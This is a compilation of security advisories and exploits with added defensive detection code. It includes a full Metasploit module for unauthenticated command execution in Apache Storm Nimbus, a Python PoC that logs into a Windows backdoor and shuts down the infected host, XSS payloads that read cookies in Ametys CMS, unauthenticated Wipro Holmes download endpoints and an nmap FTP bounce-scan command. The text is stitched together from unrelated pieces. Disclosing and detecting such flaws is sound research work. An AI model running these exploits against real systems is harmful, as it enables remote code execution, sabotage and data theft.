<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/5ff832ce6af4b03a709eaf380672cf34.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.DRA.c<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 3119 and requires authentication. However, the password "go" is weak and hardcoded in the PE file. The malware compares the password with the "lstrcmpA" Win32 API, so the string sent must match exactly: a trailing line feed "\n" (e.g. "go\n", as appended by ncat or telnet) causes authentication to fail.<br /><br />00401317 jz loc_401218<br />0040131D push offset aGo ; "go"<br />00401322 push offset buf ; lpString1<br />00401327 call lstrcmpA<br /><br />0040131D | 68 7C 40 40 00 | push backdoor.win32.dra.c.5ff832ce6af4b | 40407C "go"<br />00401322 | 68 8C 46 40 00 | push backdoor.win32.dra.c.5ff832ce6af4b |<br />00401327 | E8 F4 0C 00 00 | call <backdoor.win32.dra.c.5ff832ce6af4 |<br />0040132C | 83 F8 00 | cmp eax,0 |<br />0040132F | 74 2C | je backdoor.win32.dra.c.5ff832ce6af4b03 |<br />00401331 | 6A 00 | push 0 |<br />00401333 | 6A 11 | push 11 |<br />00401335 | 68 11 4C 40 00 | push backdoor.win32.dra.c.5ff832ce6af4b | 404C11 "invalid password."<br />0040133A | FF 35 16 4B 40 00 | push dword ptr ds:[404B16] |<br />00401340 | E8 53 0D 00 00 | call <backdoor.win32.dra.c.5ff832ce6af4 |<br />00401345 | 83 F8 FF | cmp eax,FFFFFFFF |<br /><br />Type: PE32<br />MD5: 5ff832ce6af4b03a709eaf380672cf34<br />Vuln ID: MVID-2022-0470<br />Disclosure: 01/24/2022<br /><br /><br />Exploit/PoC:<br />Using ncat or telnet will fail, as both send a trailing new line "\n", so we use a makeshift Python agent.<br />Sending the command "Run z\r\n" will initiate a shutdown of the infected host.<br /><br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=3119<br /><br /><br />def conn():<br /> 
s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /> return s<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512)<br /> if "Connected :-) !" in res or "invalid password" in res:<br /> break<br /> return res<br /><br />def doit():<br /><br /> s=conn()<br /><br /> #Bad passwd<br /> PAYLOAD="hate\r\n"<br /> s.send(PAYLOAD)<br /> print(chk_res(s))<br /> s.close()<br /><br /> time.sleep(1)<br /><br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> #Correct passwd<br /> PAYLOAD="go"<br /> s.send(PAYLOAD)<br /> print(chk_res(s))<br /><br /> time.sleep(1)<br /><br /> #initiates a shutdown of the infected machine<br /> #s.send("Run c\r\n")<br /> s.send("Run z\r\n")<br /> <br /> s.close()<br /><br /><br />if __name__=="__main__":<br /> doit()<br /> print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
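The defender-side use of the x64dbg dump above is a relocation-tolerant byte signature for hunting the same lstrcmpA password check in other samples. This is an added example, not Malvuln's code: the opcode-masking table is a constructed assumption covering only the opcodes in this listing, the text column of the dump is shortened, and the "relocated" sample is constructed.

```python
# Opcodes in the dump whose 32-bit operand is an absolute address or a relative
# call target. Those bytes change when the code is relocated, so they become
# wildcards; everything else (cmp, je, push imm8) is kept literal. This table is
# a constructed assumption covering only the opcodes present in this listing.
ADDRESS_OPERANDS = {
    b"\x68": 4,      # push imm32: pointers to "go", the input buffer, the message
    b"\xe8": 4,      # call rel32: the lstrcmpA call and the one that follows
    b"\xff\x35": 4,  # push dword ptr ds:[addr]: the value pushed before that call
}

# The x64dbg dump from the advisory, "address | bytes | text". Only the middle
# column is parsed; the text column is shortened here (targets decoded from the
# operand bytes) for readability.
LISTING = """\
0040131D | 68 7C 40 40 00 | push 40407C ; "go"
00401322 | 68 8C 46 40 00 | push 40468C ; lpString1
00401327 | E8 F4 0C 00 00 | call 402020 ; lstrcmpA
0040132C | 83 F8 00 | cmp eax,0
0040132F | 74 2C | je 40135D
00401331 | 6A 00 | push 0
00401333 | 6A 11 | push 11
00401335 | 68 11 4C 40 00 | push 404C11 ; "invalid password."
0040133A | FF 35 16 4B 40 00 | push dword ptr ds:[404B16]
00401340 | E8 53 0D 00 00 | call 402098
00401345 | 83 F8 FF | cmp eax,FFFFFFFF
"""


def listing_to_pattern(listing):
    """Turn the dump into a byte pattern: ints for literal bytes, None for
    wildcarded (address-dependent) bytes."""
    pattern = []
    for line in listing.splitlines():
        cols = line.split("|")
        if len(cols) < 3:
            continue
        insn = bytes.fromhex(cols[1].replace(" ", ""))
        for opcode, operand_len in ADDRESS_OPERANDS.items():
            if insn.startswith(opcode) and len(insn) == len(opcode) + operand_len:
                pattern.extend(opcode)
                pattern.extend([None] * operand_len)
                break
        else:
            pattern.extend(insn)
    return pattern


def to_yara_hex(pattern):
    """Render the pattern as a YARA hex string, e.g. '{ 68 ?? ?? ?? ?? ... }'."""
    return "{ " + " ".join("??" if b is None else f"{b:02X}" for b in pattern) + " }"


def find_pattern(data, pattern):
    """Return every offset in data where the wildcard pattern matches."""
    n = len(pattern)
    return [
        off for off in range(len(data) - n + 1)
        if all(p is None or data[off + i] == p for i, p in enumerate(pattern))
    ]


def listing_bytes(listing):
    """The literal bytes of the dump, used below to build constructed samples."""
    return b"".join(bytes.fromhex(l.split("|")[1].replace(" ", ""))
                    for l in listing.splitlines() if "|" in l)


# Constructed samples: the published bytes padded into a fake code section, and
# a copy whose "go" pointer and lstrcmpA call target differ (as after relocation
# or a rebuild) while the comparison logic stays byte-identical.
SAMPLE_ORIGINAL = b"\x90" * 16 + listing_bytes(LISTING) + b"\xcc" * 8
SAMPLE_RELOCATED = (SAMPLE_ORIGINAL
                    .replace(b"\x7c\x40\x40\x00", b"\x7c\x40\x50\x00")
                    .replace(b"\xf4\x0c\x00\x00", b"\x10\x0d\x00\x00"))

if __name__ == "__main__":
    pat = listing_to_pattern(LISTING)
    print(to_yara_hex(pat))
    print("original :", find_pattern(SAMPLE_ORIGINAL, pat))
    print("relocated:", find_pattern(SAMPLE_RELOCATED, pat))
```

The tail of the pattern (push 11, cmp eax,FFFFFFFF) ties it to this sample's error-message length and return check; drop the last instructions from LISTING to hunt looser variants of the same check.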
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/proto/thrift'<br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /><br /> Thrift = Rex::Proto::Thrift<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm.<br /> The getTopologyHistory RPC method takes a single argument which is the name of a user, which is<br /> concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there<br /> must have been at least one topology submitted to the server. The topology may be active or inactive, but at<br /> least one must be present. Successful exploitation results in remote code execution as the user running Apache Storm.<br /><br /> This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. 
This exploit was tested on version 2.2.0<br /> which is affected.<br /> },<br /> 'Author' => [<br /> 'Alvaro Muñoz', # discovery and original research<br /> 'Spencer McIntyre', # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-38294'],<br /> ['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/']<br /> ],<br /> 'DisclosureDate' => '2021-10-25',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 6627,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> begin<br /> connect<br /> rescue Rex::ConnectionError<br /> return CheckCode::Unknown('Failed to connect to the service.')<br /> end<br /><br /> sleep_time = rand(5..10)<br /> response, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}", { disconnect: false })<br /> recv_response(sleep_time + 5)<br /> end<br /> disconnect<br /><br /> vprint_status("Elapsed time: #{elapsed_time} seconds")<br /><br /> unless response && elapsed_time > sleep_time<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> CheckCode::Appears('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when 
:unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching<br /> cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"<br /> vprint_status("Executing command: #{cmd}")<br /><br /> send_request([<br /> Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),<br /> Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),<br /> Thrift::Data.new<br /> ].map(&:to_binary_s).join)<br /> disconnect if opts.fetch(:disconnect, true)<br /> end<br /><br /> def send_request(request)<br /> connect if sock.nil?<br /> sock.put([ request.length ].pack('N') + request)<br /> end<br /><br /> def recv_response(timeout)<br /> remaining = timeout<br /> res_size, elapsed = Rex::Stopwatch.elapsed_time do<br /> sock.timed_read(4, remaining)<br /> end<br /><br /> remaining -= elapsed<br /> return nil if res_size.nil? || res_size.length != 4 || remaining <= 0<br /><br /> res = sock.timed_read(res_size.unpack1('N'), remaining)<br /><br /> return nil if res.nil? || res.length != res_size.unpack1('N')<br /><br /> return res_size + res<br /> rescue Timeout::Error<br /> return nil<br /> end<br />end<br /></code></pre>
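The detection counterpart to the module above: a parser for the length-framed Thrift binary-protocol CALL that send_request builds (4-byte frame length, strict version word, method name, sequence id, then fields), which flags getTopologyHistory arguments that cannot be a plain user name. This is an added example, not part of the Metasploit module or of Apache Storm; the sample frames and the user-name alphabet are constructed assumptions.

```python
import re
import struct

# Thrift TBinaryProtocol (strict) constants.
VERSION_1 = 0x80010000
T_CALL = 1
T_STOP = 0
T_STRING = 11  # Metasploit's Rex::Proto::Thrift names this same type T_UTF7

# Conservative alphabet for a Storm user name (constructed assumption). The
# module's injected argument, ";<cmd> #<tag>", can never match it.
SAFE_USER_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def encode_call(method, user):
    """Constructed test traffic: a framed CALL with one string argument in
    field 1, the same shape the module's send_request() produces."""
    name = method.encode()
    arg = user.encode()
    body = struct.pack(">I", VERSION_1 | T_CALL)
    body += struct.pack(">I", len(name)) + name
    body += struct.pack(">I", 0)                 # sequence id
    body += struct.pack(">bh", T_STRING, 1)      # field type, field id
    body += struct.pack(">I", len(arg)) + arg
    body += struct.pack(">b", T_STOP)
    return struct.pack(">I", len(body)) + body   # framing, as Ruby pack('N')


def parse_call(frame):
    """Decode a framed binary-protocol CALL into (method, {field_id: string}).
    Returns None for truncated frames, non-CALL messages or non-string fields,
    so malformed traffic fails closed instead of slipping past the check."""
    if len(frame) < 4:
        return None
    (length,) = struct.unpack(">I", frame[:4])
    body = frame[4:4 + length]
    if len(body) != length:
        return None                              # truncated frame
    try:
        (ver,) = struct.unpack(">I", body[:4])
        if (ver & 0xFFFF0000) != VERSION_1 or (ver & 0xFF) != T_CALL:
            return None
        (nlen,) = struct.unpack(">I", body[4:8])
        method = body[8:8 + nlen].decode("utf-8", "replace")
        pos = 8 + nlen + 4                       # skip the sequence id
        fields = {}
        while True:
            ftype = body[pos]                    # IndexError on short frames
            pos += 1
            if ftype == T_STOP:
                break
            (fid,) = struct.unpack(">h", body[pos:pos + 2])
            pos += 2
            if ftype != T_STRING:
                return None
            (slen,) = struct.unpack(">I", body[pos:pos + 4])
            pos += 4
            if pos + slen > len(body):
                return None                      # string runs past the frame
            fields[fid] = body[pos:pos + slen].decode("utf-8", "replace")
            pos += slen
        return method, fields
    except (struct.error, IndexError):
        return None


def inspect_frame(frame):
    """Return (verdict, detail): 'alert' when getTopologyHistory carries an
    argument that is not a plain user name, 'ok' otherwise, 'malformed' when
    the frame does not decode."""
    parsed = parse_call(frame)
    if parsed is None:
        return "malformed", "undecodable Thrift frame"
    method, fields = parsed
    if method != "getTopologyHistory":
        return "ok", f"method {method!r} not in scope"
    user = fields.get(1, "")
    if SAFE_USER_RE.match(user):
        return "ok", f"user name {user!r} looks benign"
    return "alert", f"getTopologyHistory argument {user!r} is not a plain user name"


if __name__ == "__main__":
    # Constructed frames: a benign call and one shaped like the module's request.
    for u in ("stormuser", ";sleep 7 #k3Fd"):
        print(inspect_frame(encode_call("getTopologyHistory", u)))
```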
<pre><code>Document Title:<br />===============<br />Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2275<br /><br /><br />Release Date:<br />=============<br />2022-01-12<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2275<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.2<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professional blog or<br />an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed.<br />Ametys makes it easy for everyone to create and manage a unified digital platform. 
Ametys delivers a simple and intuitive user experience with<br />a familiar Office-style ribbon interface.<br /><br />(Copy of the Homepage: https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 CMS web application.<br /><br /><br />Affected Product(s):<br />====================<br />Ametys<br />Product: Ametys v4.4.1 - Content Management System (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-07-24: Researcher Notification & Coordination (Security Researcher)<br />2021-07-25: Vendor Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2022-01-12: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 CMS web application.<br />The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising<br />browser-to-web-application requests from the application side.<br />
<br />The vulnerability is located in the input fields of the link text, small description and description in the add external link function.<br />The function is for example located in the link directory of the backend. Added links are listed with status and details.<br />Attackers with low privileges are able to add their own malformed link with malicious script code in the marked vulnerable parameters.<br />After the injection, the links are displayed in the backend, where the payload executes on preview of the main link directory.<br />The attack vector of the vulnerability is persistent and the request method to inject is POST.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects<br />to malicious sources and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] Link Directory (Add)<br /><br />Vulnerable Function(s):<br />[+] add (External Link)<br /><br />Vulnerable Parameter(s):<br />[+] Link Text<br />[+] Small description<br />[+] Description<br /><br />Affected Module(s):<br />[+] Frontend (Main Link Listing)<br />[+] Backend (Link Directory)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent web vulnerability can be exploited by remote attackers with low-privileged user accounts and low user interaction.<br />For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Open the application path and log in to the service as a restricted user that is allowed to create links<br />2. Open the link directory and create a new link (top|left)<br />3. Inject the test payloads into the link text, small description and description and save via POST<br />4. 
On visit of the link directory the payloads executes in the backend listing or frontend<br />5. Successful reproduce of the persistent web vulnerability!<br /><br /><br />Payload(s):<br /><a onmouseover=alert(document.domain)>poc_link</a><br /><a onmouseover=alert(document.cookie)>poc_link</a><br /><br /><br />Vulnerable Source: Link Directory - Link (Add)<br />class="x-grid-cell-inner " style="text-align:left;"<br /><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7478 x-unselectable"<br />style="width: 248px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7478"><div unselectable="on" class="x-grid-cell-inner "<br />style="text-align:left;"><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7479<br />x-unselectable" style="width: 247px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7479"><div unselectable="on" class="x-grid-cell-inner "<br />style="text-align:left;">&nbsp;</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7480 x-grid-cell-last x-unselectable" style="width:<br />148px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7480"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">&nbsp;<br /></div></td></tr></tbody></table><table id="tableview-7474-record-105" role="presentation" data-boundview="tableview-7474" data-recordid="105"<br />data-recordindex="1" class="x-grid-item x-grid-item-selected x-grid-item-alt" style=";width:0" cellspacing="0" cellpadding="0"><tbody><tr class="<br />x-grid-row" role="row"><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7475 x-grid-cell-first x-unselectable" style="width: 396px;"<br />role="gridcell" tabindex="-1" data-columnid="gridcolumn-7475"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;"><br /><span class="a-grid-glyph ametysicon-link23"></span>test.de</div></td><td 
class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7476 x-unselectable"<br />style="width: 149px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7476"><div unselectable="on" class="x-grid-cell-inner "<br />style="text-align:left;">Normal</div></td><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml<br />Host: ametys.localhost:8000.localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------1197812616356669894551519312<br />Content-Length: 798<br />Origin: https://ametys.localhost:8000.localhost:8000<br />Connection: keep-alive<br />Referer: https://ametys.localhost:8000.localhost:8000/cms/www/index.html<br />Cookie: JSESSIONID=A1DC067A1739FDFBC72BCF921A5AA655;<br />AmetysAuthentication=YW1ldHlzX2RlbW9fdXNlcnMjd2VibWFzdGVyI1A5WndHNTNzNmJhYlRWSDI;<br />JSESSIONID=A0EC6E56FC3A2131C9D24C33CB9CCAAA<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />content={"0":{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-announcement/view.xml"},"1":<br />{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-startuptime.xml"}}&context.parameters=<br />{"siteName":"www","skin":"demo","debug.mode":"false","populationContexts":["/sites/www","/sites-fo/www"],"user":<br />{"login":"testuser_restricted","population":"ametys_demo_users","firstname":"testuser_restricted","lastname":"User","fullname":"testuser_restricted User",<br />"email":"testuser_restricted@test.com","populationLabel":"Ametys Demo Users","locale":"en"}}<br />-<br />POST: HTTP/1.1 200<br />Server: Apache/2.4.29 (Ubuntu)<br />X-Cocoon-Version: 2.1.13<br />Ametys-Dispatched: true<br 
/>Content-Type: text/xml<br />Via: 1.1 ametys.localhost:8000.localhost:8000<br />Vary: Accept-Encoding<br />Content-Encoding: gzip<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Transfer-Encoding: chunked<br />Content-Language: fr<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be patched by securely parsing and encoding the input fields of the external link add function in the link directory.<br />In a second step the input fields can be restricted for special characters to prevent further attacks.<br />As a next step the output locations where the links are displayed (frontend & backend) should be sanitized correctly.<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation web vulnerability in the Ametys web-application CMS is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download<br /># Date: 09/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38147<br /><br />In the Wipro Holmes Orchestrator 20.4.1 application, if at some point a user has exported any of the reports as Excel, these files remain on the server. When an unauthenticated user requests any of the endpoints below, such files are downloaded. Details of the vulnerable endpoints and the information exposed by the reports from these endpoints are provided below.<br /><br />User Report:-<br />API: http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/User_Report_Excel<br />Exposed Information: Username, Email, Role, First Name, Last Name, User Level and User Domain of different users.<br /><br />Domain Credentials Report:-<br />API: http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel<br />Exposed Information: Domain Credential Names, Type, Domain Names<br /><br />Other Endpoints:-<br />http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Process_Report_Excel<br />http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Infrastructure_Report_Excel<br />http://HOLMES_ORCH_HOST:PORT/processexecution/DownloadExcelFile/Resolver_Report_Excel<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/fc100ff65f676a26293915407adc211c_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Lana.01.d<br />Vulnerability: Port Bounce Scan (MITM)<br />Description: The malware listens on TCP port 6666. Third-party intruders who successfully log on can abuse the backdoor FTP server as a man-in-the-middle machine, allowing PORT command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans originate from the infected system running the afflicted malware FTP server and not from you.<br />Type: PE32<br />MD5: fc100ff65f676a26293915407adc211c<br />Vuln ID: MVID-2022-0469<br />Dropped files: FTP.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />nmap -n -Pn -b user:pass@192.168.18.129:6666 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 16:50 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://user:pass@192.168.18.129:6666<br />Connected:220 Anal FTP v0.1<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 16:50<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 16:50, 2.14s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 11.36 seconds<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
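The server-side control that defeats the bounce scan shown above is the PORT check from RFC 2577: an FTP server (or a proxy in front of one) should only open the data connection back to the client that owns the control connection, and only to an unprivileged port. This is an added example, not Malvuln's code and not the backdoor's logic; the log format and the scanner's client address (192.168.18.50) are constructed.

```python
import ipaddress
import re


def parse_port_argument(arg):
    """Parse the 'h1,h2,h3,h4,p1,p2' argument of an FTP PORT command into
    (IPv4Address, port). Raises ValueError on anything malformed."""
    parts = arg.strip().split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated decimal fields")
    try:
        nums = [int(p) for p in parts]
    except ValueError:
        raise ValueError("PORT fields must be decimal integers") from None
    if any(n < 0 or n > 255 for n in nums):
        raise ValueError("PORT fields must be in 0..255")
    ip = ipaddress.IPv4Address(".".join(str(n) for n in nums[:4]))
    port = nums[4] * 256 + nums[5]
    return ip, port


def port_command_allowed(arg, control_peer_ip):
    """Decide whether a PORT command may be honoured. The data connection must
    go back to the control connection's peer and to a port >= 1024; anything
    else is the bounce pattern Nmap's -b option relies on. Returns (bool, reason)."""
    try:
        ip, port = parse_port_argument(arg)
    except ValueError as exc:
        return False, f"malformed PORT argument: {exc}"
    if ip != ipaddress.IPv4Address(control_peer_ip):
        return False, f"PORT targets {ip} but control connection is from {control_peer_ip} (bounce)"
    if port < 1024:
        return False, f"PORT targets privileged port {port}"
    return True, f"data connection to {ip}:{port} permitted"


# Constructed server log in the shape the advisory's Nmap run would leave:
# the scanner's own address is an assumption, the scan target is 192.168.18.237.
CONSTRUCTED_LOG = """\
2022-01-23 16:50:01 peer=192.168.18.50 cmd=PORT 192,168,18,237,0,21
2022-01-23 16:50:02 peer=192.168.18.50 cmd=PORT 192,168,18,237,0,22
2022-01-23 16:50:03 peer=192.168.18.50 cmd=PORT 192,168,18,237,0,80
2022-01-23 16:52:10 peer=192.168.18.50 cmd=PORT 192,168,18,50,200,17
"""
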